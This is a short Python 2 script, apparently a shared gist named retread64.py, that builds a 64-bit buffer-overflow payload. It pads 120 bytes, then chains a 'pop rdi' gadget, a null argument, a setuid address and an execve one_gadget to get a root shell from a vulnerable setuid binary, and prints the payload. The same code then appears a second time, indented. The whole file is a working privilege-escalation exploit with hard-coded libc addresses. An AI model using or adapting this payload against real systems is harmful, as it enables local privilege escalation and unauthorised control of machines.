ShivamShrirao/retread64.py

## retread64.py
from struct import pack
junk='A'*120
setuid=pack("Q",0x7ffff7aceb50)                #convert address to little endian for 64 bit
poprdi=pack("Q",0x7ffff7a15b8b)
null=pack("Q",0x0)                             #convert to little endian for 64 bit
onegadget=pack("Q",0x7ffff7af2b8e)             #execve one_gadget
payload = junk + poprdi + null + setuid + onegadget
print payload
	from struct import pack
	junk='A'*120
	setuid=pack("Q",0x7ffff7aceb50) #convert address to little endian for 64 bit
	poprdi=pack("Q",0x7ffff7a15b8b)
	null=pack("Q",0x0) #convert to little endian for 64 bit
	onegadget=pack("Q",0x7ffff7af2b8e) #execve one_gadget
	payload = junk + poprdi + null + setuid + onegadget
	print payload